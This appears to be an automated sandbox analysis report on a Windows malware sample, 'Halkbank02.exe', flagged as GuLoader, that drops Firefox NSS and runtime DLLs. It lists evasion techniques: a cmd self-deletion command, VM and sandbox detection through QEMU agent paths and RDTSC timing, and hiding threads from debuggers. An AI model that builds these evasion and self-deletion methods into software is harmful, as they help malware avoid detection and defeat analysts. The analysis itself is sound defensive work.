      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00403640 push 966DCA76h; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00405A45 push esp; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00403C65 push ds; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00405E73 push ds; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00404A75 push 7B3E4015h; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00407231 push esp; retf
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004080C5 push E868A7E5h; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00406ED7 push esi; ret
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004082EB pushfd ; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004080ED push 7767F77Ch; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00408105 push 03C6A3FEh; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00407B29 pushfd ; retf
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004061DD push 22BD4488h; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A7409 pushfd ; iretd
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E531696 push cs; ret
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53394D push esi; ret
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53430B push cs; ret
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E53298B pushad ; ret
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 28_3_1E5323B5 push cs; ret
      Source: msvcp140.dll.28.drStatic PE information: section name: .didat
      Source: api-ms-win-core-console-l1-1-0.dll.28.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Self deletion via cmd deleteShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Halkbank02.exe, 00000001.00000002.563126695.0000000002A90000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: Halkbank02.exe, 00000001.00000002.563126695.0000000002A90000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeRDTSC instruction interceptor: First address: 00000000022A8D64 second address: 00000000022A8D64 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 4EFDC464h 0x00000013 add eax, FD8ECE7Bh 0x00000018 add eax, EA37EE74h 0x0000001d sub eax, 36C48152h 0x00000022 cpuid 0x00000024 jmp 00007FC3FC368E9Dh 0x00000029 test cl, cl 0x0000002b bt ecx, 1Fh 0x0000002f jc 00007FC3FC369698h 0x00000035 test ebx, edx 0x00000037 push di 0x00000039 mov di, 231Dh 0x0000003d pop di 0x0000003f popad 0x00000040 cmp ecx, eax 0x00000042 call 00007FC3FC368F31h 0x00000047 lfence 0x0000004a rdtsc
      Source: C:\Users\user\Desktop\Halkbank02.exeRDTSC instruction interceptor: First address: 0000000000568D64 second address: 0000000000568D64 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 4EFDC464h 0x00000013 add eax, FD8ECE7Bh 0x00000018 add eax, EA37EE74h 0x0000001d sub eax, 36C48152h 0x00000022 cpuid 0x00000024 jmp 00007FC3FCB8A4CDh 0x00000029 test cl, cl 0x0000002b bt ecx, 1Fh 0x0000002f jc 00007FC3FCB8ACC8h 0x00000035 test ebx, edx 0x00000037 push di 0x00000039 mov di, 231Dh 0x0000003d pop di 0x0000003f popad 0x00000040 cmp ecx, eax 0x00000042 call 00007FC3FCB8A561h 0x00000047 lfence 0x0000004a rdtsc
      Source: C:\Users\user\Desktop\Halkbank02.exe TID: 64Thread sleep count: 34 > 30
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8CF8 rdtsc
      Source: C:\Users\user\Desktop\Halkbank02.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Halkbank02.exeSystem information queried: ModuleInformation
      Source: Halkbank02.exe, 00000001.00000002.563126695.0000000002A90000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: Halkbank02.exe, 00000001.00000002.563126695.0000000002A90000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Halkbank02.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Halkbank02.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8CF8 rdtsc
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00401500 mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004020A7 mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004027DC mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A88B2 mov eax, dword ptr fs:[00000030h]
